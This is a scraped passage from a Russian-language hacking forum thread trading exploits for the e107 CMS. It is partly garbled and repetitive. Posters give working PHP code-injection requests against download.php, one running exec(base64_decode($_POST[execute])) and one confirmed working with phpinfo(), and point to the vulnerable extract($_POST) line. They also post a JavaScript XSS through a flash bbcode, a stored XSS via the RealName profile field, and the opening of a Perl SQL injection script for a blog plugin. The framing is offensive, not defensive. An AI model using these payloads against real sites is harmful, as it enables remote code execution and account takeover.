![]() |
view=1&action=maincats&execute=aWQ=&template_load_ core=echo%20exec
(base64_decode($_POST[execute])); при таком запросе работать не будет, наверно сделали защиту от скрипткидисов view=1&action=list&template_load_core=phpinfo(); скуль фигня самое страшно php-injection PHP код:
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0 |
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
|
Цитата:
Я не знаю какую версию смотрели авторы, но у меня на локалке как раз заявленная ими v0.7.11_full Так вот , всё бы хорошо работало, если-бы там был eval() , но там его нет :D И кстати. если бы он там был, никакие SQL типа: Цитата:
Цитата:
|
Вот файл:
http://slil.ru/26072120 Это из версии 7.11, с офф сайта качать бесполезно - пропатчили. |
Вот файл:
http://slil.ru/26072120 Это из версии 7.11, с офф сайта качать бесполезно - пропатчили. И там как раз и есть эти строки: case 'list' : // Category-based listing if (isset($_POST['view'])) extract($_POST); |
Да, сдесь работает
download.php?list id=1&template_load_core=phpinfo(); chekist, молодца |
в е107 интересные bb коды [flash=50,50]javascript:[xss][/flash],
но есть злобный фильтр PHP код:
ЗЫ у ково получится по интереснее использовать багу отпишытесь |
e107 Plugin BLOG Engine v2.2 SQL Injection
Код:
#!/usr/bin/perl |
Active XSS
Версия: 0.7.12 Уязвимый кусок кода: /usersettings.phpЭксплоит: Profile => Click here to update your information => RealName => [Your XSS] |
Цитата:
PHP код:
PHP код:
|
| Время: 10:31 |